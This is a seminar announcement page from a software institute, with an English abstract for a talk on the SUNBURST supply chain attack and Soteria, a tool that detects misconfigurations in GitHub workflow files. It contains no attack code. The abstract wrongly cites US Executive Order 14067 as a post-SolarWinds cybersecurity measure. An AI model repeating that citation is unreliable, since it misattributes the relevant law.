Seminari
Da febbraio 2019, l’Istituto del Software ha iniziato una serie di seminari. Ogni giovedì pomeriggio, un ricercatore dell’Istituto terrà un breve discorso su un argomento di ingegneria del software a sua scelta, come ad esempio articoli interessanti pubblicati di recente, articoli seminali nel proprio campo di ricerca, discussioni su idee preliminari, tutorial e piccoli esperimenti.
Sulla nostra playlist YouTube potete riguardare alcuni dei seminari precedenti. Di seguito trovate ulteriori dettagli sul prossimo seminario, su quelli a venire e un archivio dei relatori precedenti.
Tutti sono invitati a partecipare ai seminari organizzati dall’Istituto del Software.
Prossimo Relatore: Edoardo Riggio
Modern CI/CD pipelines have become central in how we automatically build, test, and deliver software. However, such pipeline automatizations have also become prime targets for sophisticated supply chain attacks. The SUNBURST attack on SolarWinds demonstrates how malicious actors can use trusted build systems to distribute tainted updates to thousands of organizations. We will start by dissecting the anatomy of SUNBURST, revealing how the Russian cyber espionage group known as Nobelium managed to successfully execute such a large-scale attack. We will then analyze its fallout, which called for major legislative efforts, such as the US Executive Order 14067 and the EU Cyber Resilience Act. Finally, we will also be introducing the research we are carrying out towards evaluating and securing the software supply chain of CI/CD environments. In particular, we will present Soteria, a tool we developed to automatically detect security misconfigurations in GitHub workflow files.
Edoardo Riggio is currently a PhD researcher in the DESIGN research group under the supervision of Prof. Cesare Pautasso. He graduated at USI in Informatics and later in Software and Data Engineering. Edoardo’s research focuses on the security of software supply chains in CI/CD environments.
Programma
-
Srdjan Krstic22 Maggio 2025